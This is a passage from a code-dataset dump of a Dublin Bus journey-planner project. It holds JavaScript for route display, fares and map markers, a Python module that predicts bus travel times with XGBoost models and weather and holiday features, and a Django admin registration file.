routeDetails['arr_stop_lat'] = journey.transit.arrival_stop.location.lat();\n routeDetails['arr_stop_lng'] = journey.transit.arrival_stop.location.lng();\n routeDetails['google_pred'] = journey.duration.value;\n\n var predictionSpace = i.toString();\n document.getElementById(predictionSpace).innerHTML = journeyDescription;\n var numStops = routeDetails['num_stops'];\n var arrivalStop = routeDetails['arrival_stop'];\n var departureStop = routeDetails['departure_stop'];\n var departureTime = journey.transit.departure_time.value;\n\n\n if (CalcOn) {\n var cost = fareCalc(age, payment, journey, time);\n total_cost += cost;\n } else {\n var cost = false;\n }\n\n\n //post details to Django view\n await postData(query_model_URL, routeDetails).then(async (data) =>\n await displayRoute(JSON.parse(data.current_pred), predictionSpace, {\n numStops: numStops\n }, {\n departureStop: departureStop\n }, {\n arrivalStop: arrivalStop\n }, {\n departureTime: departureTime\n }, cost));\n\n\n\n } else if (journey.travel_mode == \"WALKING\") {\n journeyDescription = \"<i class='fas fa-walking'></i> \" + journey.distance.text + \"/\" + journey.duration.text + \"<br>\"\n journeyDescription += journey.instructions;\n journeyDescription += divider;\n route_suggestions.innerHTML += journeyDescription;\n\n duration_tracker[i] = Math.round(journey.duration.value / 60);\n\n\n } else if (journey.travel_mode == \"TRANSIT\" && journey.transit.line.vehicle.type == \"BUS\" || journey.travel_mode == \"TRANSIT\" && journey.transit.line.vehicle.type == \"INTERCITY_BUS\") {\n if (!journey.transit.line.short_name) {\n var name = journey.transit.line.name;\n } else {\n var name = journey.transit.line.short_name;\n }\n journeyDescription = \"<i class='fas fa-bus-alt'></i> \" + name + \" | \";\n journeyDescription += \"<i class='fas fa-clock'></i> \" + journey.transit.departure_time.text + ' | ';\n journeyDescription += journey.transit.num_stops + ' stops/' + journey.duration.text + ' <i class=\"fas fa-info-circle d-none d-sm-inline\" data-toggle=\"tooltip\" title=\"Prediction generated by Google\" data-placement=\"auto\"></i>';\n time_tracker = new Date(journey.transit.departure_time.value);\n time_tracker.setSeconds(0);\n time_tracker.setSeconds(time_tracker.getSeconds() + journey.duration.value);\n time_tracker.setSeconds(0);\n latest_departure[i] = time_tracker;\n\n\n\n\n if (CalcOn) {\n journeyDescription += \" €?\";\n }\n journeyDescription += '<br>' + journey.transit.departure_stop.name + ' to ' + journey.transit.arrival_stop.name + \"<br>\";\n journeyDescription += \"<span id = 'not-db'>* Not a Dublin Bus Route</span>\";\n journeyDescription += divider;\n route_suggestions.innerHTML += journeyDescription;\n } else {\n no_route = true;\n\n\n }\n })\n //Write Total Cost\n if (CalcOn) {\n route_suggestions.innerHTML += '<p>Total Fare: €' + total_cost.toFixed(2).toString() + '</p>';\n }\n\n return [latest_departure, duration_tracker];\n }\n } else {\n showWarning(\"No route could be found. Please try again.\");\n return;\n }\n\n\n\n\n async function displayRoute(journeyPrediction, predictionSpace, numStops, departureStop, arrivalStop, departureTime, cost) {\n var pred;\n\n if (typeof journeyPrediction == 'string') {\n journeyPrediction = journeyPrediction.slice(1, -1);\n var predictionMins = parseInt(journeyPrediction);\n\n time_tracker = new Date(departureTime.departureTime);\n time_tracker.setSeconds(0);\n time_tracker.setSeconds(time_tracker.getSeconds() + (predictionMins * 60));\n time_tracker.setSeconds(0);\n latest_departure[predictionSpace] = time_tracker;\n pred = numStops.numStops + ' stops/' + predictionMins.toString() + ' mins <i class=\"fas fa-info-circle d-none d-sm-inline\" data-toggle=\"tooltip\" title=\"Prediction generated by Bustimate\" data-placement=\"auto\"></i>';\n\n\n } else {\n\n time_tracker = new Date(departureTime.departureTime);\n time_tracker.setSeconds(0);\n time_tracker.setSeconds(time_tracker.getSeconds() + journeyPrediction);\n time_tracker.setSeconds(0);\n latest_departure[predictionSpace] = time_tracker;\n var predictionMins = Math.round(journeyPrediction / 60);\n pred = numStops.numStops + ' stops/' + predictionMins.toString() + ' mins <i class=\"fas fa-info-circle d-none d-sm-inline\" data-toggle=\"tooltip\" title=\"Prediction generated by Google\" data-placement=\"auto\"></i>';\n }\n\n if (cost) {\n pred += ' €' + cost.toFixed(2).toString();\n }\n document.getElementById(predictionSpace).innerHTML += pred;\n document.getElementById(predictionSpace).innerHTML += '<br>' + departureStop.departureStop + ' to ' + arrivalStop.arrivalStop + \"<br>\" + divider;\n }\n })\n}\n\n\nasync function displayEstimatedArrival(latest_departure, duration_tracker, no_route) {\n if (no_route) {\n document.getElementById('route_suggestions').style.visibility = \"visible\";\n } else {\n var minutes_to_add = 0;\n //get latest bus time_tracker (time of bus departure + time of prediction/duration)\n\n var key;\n var intKey;\n var latest = 0;\n\n for (key in latest_departure) {\n intKey = parseInt(key);\n if (intKey > latest) {\n latest = intKey;\n }\n }\n\n\n\n //find durations after latest departures\n Object.keys(duration_tracker).forEach(key => {\n if (key > latest) {\n minutes_to_add += duration_tracker[key]\n }\n });\n\n\n //add walking durations after latest bus journey\n\n latest_departure[latest].setMinutes(latest_departure[latest].getMinutes() + minutes_to_add);\n var min;\n if (latest_departure[latest].getHours() > 11) {\n min = 'pm';\n } else {\n min = 'am';\n }\n if (latest_departure[latest].getSeconds() > 30) {\n var minutes = latest_departure[latest].getMinutes() + 1\n } else {\n minutes = latest_departure[latest].getMinutes()\n }\n //convert hours from 24 hour to 12 hour clock\n var hours = ((latest_departure[latest].getHours() + 11) % 12 + 1);\n\n route_suggestions.innerHTML += 'Estimated arrival time: ' + hours + ':' + String(minutes).padStart(2, '0') + min;\n document.getElementById('route_suggestions').style.visibility = \"visible\";\n\n }\n}\n\nfunction fareCalc(age, payment, journey, time) {\n var ticket\n\n if (journey.transit.line.short_name.includes(\"X\")) {\n ticket = \"Xpresso\"\n //Check if 90 or 40E\n } else if (journey.transit.line.short_name === \"90\" || journey.transit.line.short_name === \"40E\") {\n ticket = \"90_OR_40E\"\n //If adult check route length\n } else if (age === \"adult\") {\n if (journey.transit.num_stops <= 3) {\n ticket = \"1-3\"\n } else if (journey.transit.num_stops <= 13) {\n ticket = \"4-13\"\n } else {\n ticket = \"13<\"\n }\n\n //If child check if it's school hours\n } else {\n if (schoolHours(time)) {\n ticket = \"school\"\n } else {\n ticket = \"all\"\n }\n }\n\n return fares[age][payment][ticket]\n}\n\n\nfunction schoolHours(timeString) {\n var date = new Date(timeString);\n\n switch (date.getDay()) {\n case 0:\n return false;\n case 1:\n case 2:\n case 3:\n case 4:\n case 5:\n if (date.getHours() < 19) {\n return true;\n } else {\n return false;\n }\n default:\n if (date.getHours() < 13 || (date.getHours() == 13 && date.getMinutes() < 30)) {\n return true;\n } else {\n return false;\n }\n }\n}\n\n\n//Triggered by pressing submit button. Gets route and current time and sends it to getRoute\nfunction submitRoute() {\n no_route = false;\n //get rid of warning\n document.getElementById('warning').style.display = 'none';\n\n var time = inputTime.value;\n if (!time) {\n time = formatTime(new Date());\n }\n\n var route = getRouteData();\n\n if (route) {\n var destinationLatLon = {\n lat: route['destin_lat'],\n lng: route['destin_lon'],\n };\n var originLatLon = {\n lat: route['origin_lat'],\n lng: route['origin_lon'],\n }\n getRoute(originLatLon, destinationLatLon, time);\n }\n}\n\n//Swaps active tabs\nfunction changeTabs(tab_id) {\n var active_tab = document.querySelector('.tab-content .active');\n //\n if (active_tab['id'] == tab_id) {\n return\n } else {\n var tab_list = document.querySelectorAll('.tab-content .tab-pane');\n var tab_valid = false;\n tab_list.forEach(function(tab) {\n if (tab_id == tab['id']) {\n tab_valid = true;\n }\n })\n if (tab_valid) {\n\n var new_tab = document.getElementById(tab_id)\n //Change tabs\n new_tab.classList.add(\"active\");\n new_tab.classList.add(\"show\");\n active_tab.classList.remove(\"active\");\n active_tab.classList.remove(\"show\");\n\n //Change buttons\n var new_tab_button = document.getElementById(tab_id + \"-btn\");\n var active_tab_button = document.getElementById(active_tab['id'] + \"-btn\");\n\n new_tab_button.classList.add(\"active\");\n active_tab_button.classList.remove(\"active\");\n\n new_tab_button.setAttribute(\"aria-selected\", \"true\");\n active_tab_button.setAttribute(\"aria-selected\", \"false\");\n\n\n } else {\n console.log(\"ERROR: \" + tab + \" not found\");\n }\n }\n checkFavourite();\n}\n\n//adds markers to map\nfunction addMarkers(stops_data) {\n\n infoWindow = new google.maps.InfoWindow();\n //create stop icon\n var busStopIcon = {\n url: '../static/Bus/bus-stop-60.png',\n scaledSize: new google.maps.Size(30, 30),\n };\n\n for (var i = 0; i < stops_data.length; i++) {\n const marker = new google.maps.Marker({\n icon: busStopIcon,\n position: {\n lat: stops_data[i].fields.stop_lat,\n lng: stops_data[i].fields.stop_lon\n },\n map: map,\n title: stops_data[i].pk + \":\" + stops_data[i].fields.stop_name, //store stop_id and stop_name as title in marker for access\n });\n\n //add reference to each marker in stopMarkers\n stopMarkers[stops_data[i].pk] = marker;\n\n //array to hold markers\n stopMarkersArr.push(marker);\n\n\n //add listener: when marker is clicked, the stop_id is sent to the front end to grab latest arrival details\n marker.addListener(\"click\", () =>\n postData('/fetch_arrivals/', marker.title.split(\":\")[0]).then((data) =>\n displayInfoWindow(data.timetable, data.delays, marker.title.split(\":\")[0])))\n }\n\n //clusters added, need to be styles\n clusterStyles = {\n ignoreHidden: true,\n gridSize: 70,\n maxZoom: 15,\n styles: [{\n height: 30,\n width: 30,\n anchorText: [10, 15],\n textColor: 'white',\n textSize: 10,\n url: \"../static/Bus/marker_clusters/icons8-filled-circle-30.png\",\n },\n {\n height: 50,\n width: 50,\n anchorText: [18, 24],\n textColor: 'white',\n textSize: 12,\n fontWeight: 'bold',\n url: \"../static/Bus/marker_clusters/icons8-filled-circle-50.png\",\n },\n {\n height: 65,\n width: 65,\n anchorText: [25, 33],\n textColor: 'white',\n textSize: 14,\n url: \"../static/Bus/marker_clusters/icons8-filled-circle-70.png\",\n },\n ],\n };\n\n markerCluster = new MarkerClusterer(map, stopMarkersArr, clusterStyles);\n}\n\n//Swaps Input values\nfunction swapInputs() {\n var active_tab = $('.tab-content .active').attr('id');\n\n if (active_tab == \"locations-tab\") {\n\n //Store Origin Locations\n var temp = inputOrigin.value;\n var tempPlace = autocompleteOrigin.getPlace();\n\n //Turn off geo-location button\n if (currentLocationOrigin) {\n toggleCurrentLocation();\n }\n\n inputOrigin.value = inputDestination.value;\n inputDestination.value = temp;\n\n autocompleteOrigin.set('place', autocompleteDestin.getPlace());\n autocompleteDestin.set('place', tempPlace);\n } else {\n var temp = inputFirstStop.value;\n inputFirstStop.value = inputLastStop.value;\n inputLastStop.value = temp;\n }\n checkFavourite();\n}\n\n\n//Activates Current Location as origin\nfunction toggleCurrentLocation() {\n if ('geolocation' in navigator) {\n currentLocationOrigin = !currentLocationOrigin;\n inputOrigin.disabled = !inputOrigin.disabled;\n\n //Aesthetic Changes - placeholder while waiting for geolocation/geocoding to return current location\n if (currentLocationOrigin) {\n $('#currentLocationButton').attr('class', 'btn btn-info');\n inputOrigin.value = \"\";\n inputOrigin.placeholder = \"retrieving current location...\";\n var geo_promise = getPosition()\n if (!geo_promise) {\n alert(\"Browser is unable to use Geolocation services\");\n } else {\n geo_promise.then(\n function(value) {\n var originLatLon = {\n lat: value['coords']['latitude'],\n lng: value['coords']['longitude']\n }\n\n geocoder.geocode({\n location: originLatLon\n }, (results, status) => {\n if (status === \"OK\") {\n var location_description = results[0].address_components[0].long_name + ' ' + results[0].address_components[1].long_name;\n inputOrigin.value = location_description;\n autocompleteOrigin.set('place', results[0]);\n checkFavourite();\n }\n });\n },\n function(error) {\n console.log(error)\n }\n )\n }\n } else {\n inputOrigin.value = \"\";\n inputOrigin.placeholder = \"Enter your start point\";\n autocompleteOrigin.set('place', null);\n $('#currentLocationButton').attr('class', 'btn btn-secondary');\n }\n //checkFavourite() //Check if current values are a favourite\n } else {\n alert(\"Browser is unable to use Geolocation services\");\n }\n}\n\n//Get Promise for current location\nfunction getPosition(options = PositionOptions) {\n return new Promise((resolve, reject) =>\n navigator.geolocation.getCurrentPosition(resolve, reject, options)\n );\n}\n\n//displays infoWindow content\nfunction displayInfoWindow(timetable, delays, stop_id) {\n var arrivals = timetable;\n const marker = stopMarkers[stop_id];\n var arrival_time;\n\n function factorDelay(duration, delay) {\n //takes time as string, converts it to seconds, adds delay, reconverts to string and returns\n let [hours, minutes, seconds] = duration.split(':');\n seconds = (Number(hours) * 60 * 60 + Number(minutes) * 60 + Number(seconds)) + delay;\n var date = new Date(1970, 0, 1);\n date.setSeconds(seconds);\n return date.toTimeString().replace(/.*(\\d{2}:\\d{2}:\\d{2}).*/, \"$1\");\n };\n\n\n\n let infoWindowContent = \"<div id='info_window'><h6>\" + marker.title.split(\":\")[1] + \"</h6>\";\n\n //if no buses are due at the stop in next 2 hours\n if (arrivals.length == 0) {\n infoWindowContent += \"<br>No buses stopping here today.\";\n\n //if less than 3 buses due to stop in next 2 hours\n } else if (arrivals.length <= 3) {\n for (var each in arrivals) {\n infoWindowContent += \"<br><i class='fas fa-bus-alt'></i> \" + arrivals[each].trip_id.route_id.route_short_name + \" (to \" + arrivals[each].stop_headsign + \") - \";\n if (delays[each] != 0) {\n arrival_time = factorDelay(arrivals[each].arrival_time, delays[each])\n } else {\n arrival_time = arrivals[each].arrival_time;\n }\n\n infoWindowContent += arrival_time.slice(0, 5) + \"<br>\";\n }\n\n }\n infoWindowContent += \"</div>\"\n infoWindow.setContent(infoWindowContent);\n infoWindow.open(map, marker);\n}\n\n\n//function to clear stop markers from map\nfunction clearMarkers() {\n for (var i = 0; i < stopMarkersArr.length; i++) {\n stopMarkersArr[i].setVisible(false);\n }\n}\n\n//function to make stop markers visible again\nfunction showMarkers() {\n for (var marker in stopMarkers) {\n stopMarkers[marker].setVisible(true);\n }\n\n}\n\n//function to reset journey planner - should also reset time dropdown???\nfunction resetJourneyPlanner() {\n document.getElementById('route_suggestions').innerHTML = \"\";\n directionsRenderer.set('directions', null);\n directionsRenderer.setMap(null);\n endMarker.setVisible(false);\n startMarker.setVisible(false);\n no_route = false;\n\n //Delete Warning\n document.getElementById('warning').style.display = 'none';\n\n //Reset Inputs\n inputOrigin.placeholder = \"Enter your start point\";\n inputOrigin.value = \"\";\n inputDestination.value = \"\";\n infoWindow.close();\n inputFirstStop.value = \"\";\n inputLastStop.value = \"\";\n inputTime.value = \"\";\n //reset map center and zoom\n\n map.setZoom(14);\n map.setCenter({\n lat: 53.350140,\n lng: -6.266155\n });\n showMarkers();\n\n\n //Reset autocompletes\n autocompleteOrigin.set('place', null);\n autocompleteDestin.set('place', null);\n if (currentLocationOrigin) {\n toggleCurrentLocation();\n }\n\n //reset fare calculator\n document.getElementById('fare_suggestions').style.display = \"none\";\n $('#fareCalculator').attr('class', 'btn btn-secondary');\n}\n\n\nfunction displayFareButtons() {\n var fare_suggestions = document.getElementById('fare_suggestions');\n if (fare_suggestions.style.display == \"none\") {\n $('#fareCalculator').attr('class', 'btn btn-info');\n fare_suggestions.style.display = \"block\";\n } else {\n fare_suggestions.style.display = \"none\";\n $('#fareCalculator').attr('class', 'btn btn-secondary');\n }\n}\n\nfunction toggleFavourite() {\n //Remove From Favourites\n if (current_user != null) {\n if (isFavourite) {\n var data = {\n id: currentFavourite\n }\n var promise = postData(remove_favourite_URL, data);\n\n promise.then(\n function(value) {\n if (value['success'] == true) {\n for (var i = 0; i < favourites.length; i++) {\n if (favourites[i].id == currentFavourite) {\n favourites.splice(i, 1);\n break;\n }\n }\n checkFavourite()\n }\n }\n )\n //Add to favourites\n } else {\n //remove warning\n document.getElementById('warning').style.display = 'none';\n var promise = postData(create_favourite_URL, getRouteData());\n if (typeof promise.then === \"function\") {\n promise.then(\n function(value) {\n if (value['success'] == true) {\n favourites.push(value['favourite'])\n checkFavourite()\n }\n }\n )\n }\n }\n }\n};\n\n\n\n//Checks if the current input is a favourite and alters DOM elements accordingly\nvar checkFavourite = function(evt) {\n if (current_user != null) {\n var currentRoute = getRouteData(false);\n var match = false;\n var co_ords = {\n origin_lat: currentRoute.origin_lat,\n origin_lon: currentRoute.origin_lon,\n destin_lat: currentRoute.destin_lat,\n destin_lon: currentRoute.destin_lon\n }\n for (var i = 0; i < favourites.length; i++) {\n var fav_co_ords = {\n origin_lat: favourites[i].origin_lat,\n origin_lon: favourites[i].origin_lon,\n destin_lat: favourites[i].destin_lat,\n destin_lon: favourites[i].destin_lon\n }\n if (JSON.stringify(co_ords) === JSON.stringify(fav_co_ords)) {\n match = true;\n currentFavourite = favourites[i].id;\n isFavourite = true;\n $('#favouriteButton').attr('class', 'btn btn-info');\n break;\n }\n }\n if (!match) {\n isFavourite = false;\n $('#favouriteButton').attr('class', 'btn btn-secondary');\n }\n }\n}\n//set minimum date field to current date so user can't plan journeys in the past\ndocument.getElementById(\"time-dropdown\").setAttribute(\"min\", formatTime(new Date()));\n\n//Check if current values are on the favourites list, triggered on changes to bus inputs\ninputFirstStop.addEventListener('input', checkFavourite, false);\ninputLastStop.addEventListener('input', checkFavourite, false);\n\n//Listeners that trigger on input change\n$('#locations-tab-btn').on('shown.bs.tab', function() {\n checkFavourite();\n})\n$('#stops-tab-btn').on('shown.bs.tab', function() {\n checkFavourite();\n})" }, { "alpha_fraction": 0.6198092103004456, "alphanum_fraction": 0.6342967748641968, "avg_line_length": 40.00882339477539, "blob_id": "07a5203ceb5001fc487a8b77777fa235549cc6cc", "content_id": "9c3bbebd6e41efd219b8adf53af2caec464e1e6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13943, "license_type": "no_license", "max_line_length": 194, "num_lines": 340, "path": "/Dublin_Bus/Bus/busmodels.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "import pickle\nimport pandas as pd\nimport xgboost\nimport sklearn\nfrom .models import CurrentWeather, Stop, WeatherPrediction\nfrom datetime import datetime, date, timezone\nimport holidays\nimport numpy as np\nimport json\nimport os.path\nfrom dateparser import parse\nimport pytz\n\n\ndef get_current_weather():\n \"\"\" retrieves current weather info\"\"\"\n current_weather = CurrentWeather.objects.first()\n return create_weather_df(current_weather)\n\n\ndef create_weather_df(weather_object):\n \"\"\" creates dataframe from weather object \"\"\"\n data = [[weather_object.temp, weather_object.wind_speed, weather_object.weather_main, weather_object.humidity]]\n df = pd.DataFrame(data, columns=['temp', 'wind_speed', 'weather_main', 'humidity'])\n df['weather_main_precipitation'] = df['weather_main'].apply(\n lambda x: 1 if x in ['Rain', 'Drizzle', 'Snow'] else 0)\n df.drop('weather_main', axis=1, inplace=True)\n return df\n\n\ndef get_future_weather(departure_time):\n \"\"\" retrieves future weather info\"\"\"\n timestamp_obj = departure_time.timestamp()\n\n # get nearest matching entry by timestamp, defaulting to nearest timestamp hour behind\n try:\n future_weather = WeatherPrediction.objects.filter(dt__lt=timestamp_obj).order_by('-dt')[0]\n return create_weather_df(future_weather)\n except IndexError as e:\n print(e)\n\n\ndef encode_time_features(departure_time):\n # get time in seconds\n midnight = departure_time.replace(hour=0, minute=0, second=0, microsecond=0)\n time_in_seconds = (departure_time - midnight).seconds\n\n # get day of week, monday=0, sunday=6\n day_of_week = departure_time.date().weekday()\n date = departure_time.date().strftime('%Y-%m-%d')\n hour = departure_time.hour\n\n data = [[time_in_seconds, day_of_week, date, hour]]\n return data\n\n\ndef encode_features(departure_time):\n \"\"\"encodes actualtime_dep, weekday, term, holiday & rush hour features for the model\n returns a dataframe\"\"\"\n\n data = encode_time_features(departure_time)\n df = pd.DataFrame(data, columns=['actualtime_dep', 'weekday', 'date', 'hour'])\n\n df = term_flag(df)\n df = holiday_flag(df)\n df = rush_hour_flag(df)\n\n df['weekday_1'] = df['weekday'].apply(lambda x: 1 if x in [1] else 0)\n df['weekday_2'] = df['weekday'].apply(lambda x: 1 if x in [2] else 0)\n df['weekday_3'] = df['weekday'].apply(lambda x: 1 if x in [3] else 0)\n df['weekday_4'] = df['weekday'].apply(lambda x: 1 if x in [4] else 0)\n df['weekday_5'] = df['weekday'].apply(lambda x: 1 if x in [5] else 0)\n df['weekday_6'] = df['weekday'].apply(lambda x: 1 if x in [6] else 0)\n df.drop(['weekday', 'date', 'hour'], axis=1, inplace=True)\n return df\n\n\ndef term_flag(df):\n \"\"\" adds term time flag if date of departure falls within school term, need to be manually changed, current dates\n are for 2021/22 school year \"\"\"\n df['is_term'] = np.where(\n (df['date'] > '2021-09-01') & (df['date'] < '2021-10-25') | (df['date'] > '2021-10-29') & (\n df['date'] < '2021-12-22') | (df['date'] > '2022-01-06') & (df['date'] < '2022-02-15') | (\n df['date'] > '2022-02-19') & (df['date'] <= '2022-03-26') | (df['date'] >= '2022-04-12') & (\n df['date'] <= '2022-07-01'), 1, 0)\n return df\n\n\n# adapted from here https://towardsdatascience.com/5-minute-guide-to-detecting-holidays-in-python-c270f8479387\ndef holiday_flag(df):\n \"\"\"adds holiday flag if date of departure is public holiday\"\"\"\n ireland_holidays = []\n\n for date in holidays.Ireland(years=2021).items():\n ireland_holidays.append(str(date[0]))\n\n df['is_holiday'] = [1 if str(val).split()[0] in ireland_holidays else 0 for val in df['date']]\n return df\n\n\ndef rush_hour_flag(df):\n \"\"\"adds rush hour flag if time of departure is during rush hour\"\"\"\n rush_hours = [7, 8, 16, 17, 18]\n weekdays = [1, 2, 3, 4, 5]\n\n conditions = [\n df['weekday'].isin(weekdays) & df['hour'].isin(rush_hours)\n ]\n\n choices = [1]\n df['is_rush_hour'] = np.select(conditions, choices, default=0)\n\n return df\n\n\ndef read_json(filename):\n with open(filename) as f:\n historical_averages = json.load(f)\n return historical_averages\n\n\ndef check_file_exists(filename):\n if os.path.exists(filename):\n historical_averages = read_json(filename)\n return historical_averages\n else:\n return None\n\n\ndef get_proportion_of_route(route, departure_stop, num_stops, dep_stop_lat, dep_stop_lng, arrival_stop, arr_stop_lat, arr_stop_lng, rush_hour=False):\n \"\"\"import json file with historical averages for relevant line \"\"\"\n filename = 'json/avg' + route + '.json'\n historical_averages = check_file_exists(filename)\n if historical_averages is not None:\n # find departure and arrival stop and slice list of historical averages by stops\n potential_departure_stops = get_stop_num(dep_stop_lat, dep_stop_lng, departure_stop, True)\n potential_arrival_stops = get_stop_num(arr_stop_lat, arr_stop_lng, arrival_stop, True)\n\n if len(potential_departure_stops) == 0 or len(potential_arrival_stops) == 0:\n # calculate proportion of route by number of stops instead\n proportion_total = get_percentage_of_route_by_stops(route, num_stops)\n return proportion_total\n else:\n # find index of list for start and end stop\n for i in range(0, len(potential_departure_stops)):\n start_index = next((index for (index, d) in enumerate(historical_averages) if d[\"stoppointid\"] == potential_departure_stops[i]), None)\n if start_index is not None:\n break\n for i in range(0, len(potential_arrival_stops)):\n end_index = next((index for (index, d) in enumerate(historical_averages) if\n d[\"stoppointid\"] == potential_arrival_stops[i]), None)\n if end_index is not None:\n break\n\n if start_index is not None and end_index is not None:\n historical_averages_slice = historical_averages[start_index +1: end_index+1]\n print(route)\n if rush_hour:\n proportion_total = sum(item['mean_tt_rush_hour%'] for item in historical_averages_slice)\n else:\n proportion_total = sum(item['mean_tt%'] for item in historical_averages_slice)\n return proportion_total / 100\n else:\n # calculate proportion of route by stops instead\n proportion_total = get_percentage_of_route_by_stops(route, num_stops)\n return proportion_total\n\n else:\n proportion_total = get_percentage_of_route_by_stops(route, num_stops)\n # calculate proportion of route by number of stops instead\n return proportion_total\n\n\ndef get_percentage_of_route_by_stops(route, num_stops):\n df = pd.read_csv('df_routes.csv')\n # retrieve records for a particular line\n df = df.loc[(df['routeid'] == route)]\n total_stops = max(df['progrnumber'])\n proportion_total = num_stops / total_stops\n return proportion_total\n\n\ndef get_stop_num_lat_lng(stop_lat, stop_lng, integer=False):\n \"\"\"function takes stop lat and lng and returns stoppoint id/number match\n\n called if matching by name doesn't work. If integer flag=True, returns integer otherwise returns string\n\"\"\"\n # truncate lat & lng to 3 decimal places for matching (Google and GTFS data don't give the exact same lat/lng for\n # stops, but are typically the same within 3 decimal places\n stop_lat = float(int(stop_lat * (10 ** 3)) / 10 ** 3)\n stop_lng = float(int(stop_lng * (10 ** 3)) / 10 ** 3)\n stop_query = Stop.objects.filter(stop_lat__startswith=stop_lat, stop_lon__startswith=stop_lng).values('stop_name')\n\n stop_num_list = []\n for i in range(0, len(stop_query)):\n current = stop_query[i]['stop_name']\n stop_num = [int(j) for j in current.split() if j.isdigit()]\n stop_num_str = ''.join([str(elem) for elem in stop_num])\n if integer:\n stop_num_list.append(int(stop_num_str))\n else:\n stop_num_list.append(stop_num_str)\n\n return stop_num_list\n\n\ndef get_stop_num(stop_lat, stop_lng, stop_name, integer=False):\n \"\"\"function takes stop name string and matches it up to return potential list of stoppoint id/number matches\n if integer flag is true, return stop ids as list of ints, otherwise returns as list of strings\"\"\"\n\n # query stops model (GTFS data in DB) for matches with Google response stop name\n start_stop_query = Stop.objects.filter(stop_name__icontains=stop_name).values('stop_name')\n # add matches to a list\n stop_num_list = []\n for i in range(0, len(start_stop_query)):\n current = start_stop_query[i]['stop_name']\n stop_num = [int(j) for j in current.split() if j.isdigit()]\n stop_num_str = ''.join([str(elem) for elem in stop_num])\n if integer:\n stop_num_list.append(int(stop_num_str))\n else:\n stop_num_list.append(stop_num_str)\n\n # If we fail to match stop by name, we attempt to match by lat/lng\n if len(stop_num_list) == 0:\n stop_num_list = get_stop_num_lat_lng(stop_lat, stop_lng)\n\n return stop_num_list\n\n\ndef find_route(arr_stop_lat, arr_stop_lng, dep_stop_lat, dep_stop_lng, departure_stop, arrival_stop, line):\n \"\"\"takes line, departure stop name/lat/lng, arrival stop name/lat/lng from Google API response and finds a\n matching Dublin Bus route \"\"\"\n\n # first retrieve relevant bus stop numbers by matching those in database (GTFS) with the string returned by Google\n potential_departure_stops = get_stop_num(dep_stop_lat, dep_stop_lng, departure_stop, True)\n potential_arrival_stops = get_stop_num(arr_stop_lat, arr_stop_lng, arrival_stop, True)\n\n # SAVE CSV AGAIN WITHOUT INDEX, read in routes CSV\n df = pd.read_csv('df_routes.csv')\n\n # retrieve records for a particular line\n df = df.loc[(df['lineid'] == line)]\n\n # This finds the route by checking which subroute for a line contains both the departure and arrival stops given\n # by Google\n filter1 = df['stoppointid'].isin(potential_departure_stops)\n filter2 = df['stoppointid'].isin(potential_arrival_stops)\n df = df[filter1 | filter2]\n route = df['routeid'].tolist()\n\n if len(route) == 0:\n route = None\n else:\n route = max(route, key=route.count)\n return route\n\n\ndef change_timezone(departure_time):\n \"\"\"time sent from frontend is UTC, change timezone to Dublin\"\"\"\n dublin = pytz.timezone(\"Europe/Dublin\")\n dublin_time = parse(departure_time)\n departure_time = dublin_time.astimezone(dublin)\n return departure_time\n\n\ndef open_model_and_predict(route, df_all):\n\n # load the model that corresponds to the route\n f = open('predictive_models/' + route + '_XG_model.sav', 'rb')\n model = pickle.load(f)\n # make predictions\n predicted_tt = model.predict(df_all)\n return predicted_tt\n\n\ndef is_rush_hour_or_not(route, details, df_all):\n if df_all['is_rush_hour'].iat[0]:\n proportion_of_route = get_proportion_of_route(route, details['departure_stop'], details['num_stops'],\n details['dep_stop_lat'], details['dep_stop_lng'], details['arrival_stop'], details['arr_stop_lat'], details['arr_stop_lng'], rush_hour=True)\n else:\n proportion_of_route = get_proportion_of_route(route, details['departure_stop'], details['num_stops'],\n details['dep_stop_lat'], details['dep_stop_lng'], details['arrival_stop'], details['arr_stop_lat'], details['arr_stop_lng'])\n return proportion_of_route\n\n\ndef get_prediction(details):\n \"\"\"takes journey planner input / Google response and returns predicted travel time \"\"\"\n # find out which route, and therefore which model is required\n route = find_route(details['arr_stop_lat'], details['arr_stop_lng'], details['dep_stop_lat'],\n details['dep_stop_lng'], details['departure_stop'], details['arrival_stop'], details['line'])\n\n # if we don't have a model or matching route, return Google's duration prediction instead\n if route is None:\n predicted_tt = details['google_pred']\n\n else:\n # change timezone from UTC to Irish\n departure_time = change_timezone(details['departure_time'])\n # encode features for our model\n df_bus = encode_features(departure_time)\n\n # if departure date and hour is the same, we get the current weather, else we get weather forecast for that time\n now = datetime.now()\n if departure_time.date() == now.date() and departure_time.hour == now.hour:\n df_weather = get_current_weather()\n\n else:\n df_weather = get_future_weather(departure_time)\n\n df_all = pd.concat([df_bus, df_weather], axis=1)\n cols = ['actualtime_dep',\n 'temp',\n 'wind_speed',\n 'humidity',\n 'weather_main_precipitation',\n 'is_term',\n 'is_holiday',\n 'is_rush_hour',\n 'weekday_1',\n 'weekday_2',\n 'weekday_3',\n 'weekday_4',\n 'weekday_5',\n 'weekday_6']\n df_all = df_all[cols]\n\n predicted_tt = open_model_and_predict(route, df_all)\n\n proportion_of_route = is_rush_hour_or_not(route, details, df_all)\n\n if proportion_of_route is None:\n # In case proportion_of_route_fails, i.e. if the arrival or departure stop was not part of the route in 2018\n predicted_tt = details['google_pred']\n else:\n partial_prediction = proportion_of_route * predicted_tt\n predicted_tt_mins = partial_prediction / 60\n predicted_tt = json.dumps(str(predicted_tt_mins))\n\n return predicted_tt\n" }, { "alpha_fraction": 0.8116883039474487, "alphanum_fraction": 0.8116883039474487, "avg_line_length": 29.799999237060547, "blob_id": "81fadbfc7fd6eff8739a698a8b08aa06bae99023", "content_id": "f0dda9e81d5e05fbf19da8a6aadf116220394eff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 308, "license_type": "no_license", "max_line_length": 71, "num_lines": 10, "path": "/Dublin_Bus/Bus/admin.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Stop, Route, Calendar, CalendarDate, Trip, StopTime\n\n# Register your models here.\nadmin.site.register(Stop)\nadmin.site.register(Route)\nadmin.site.register(Calendar)\nadmin.site.register(CalendarDate)\nadmin.site.register(Trip)\nadmin.site.register(StopTime)\n" }, { "alpha_fraction": 0.6649903059005737, "alphanum_fraction": 0.6649903059005737, "avg_line_length": 33.93243408203125, "blob_id": "6e043e45bb06995d81a93de157c9e8c566933ac5", 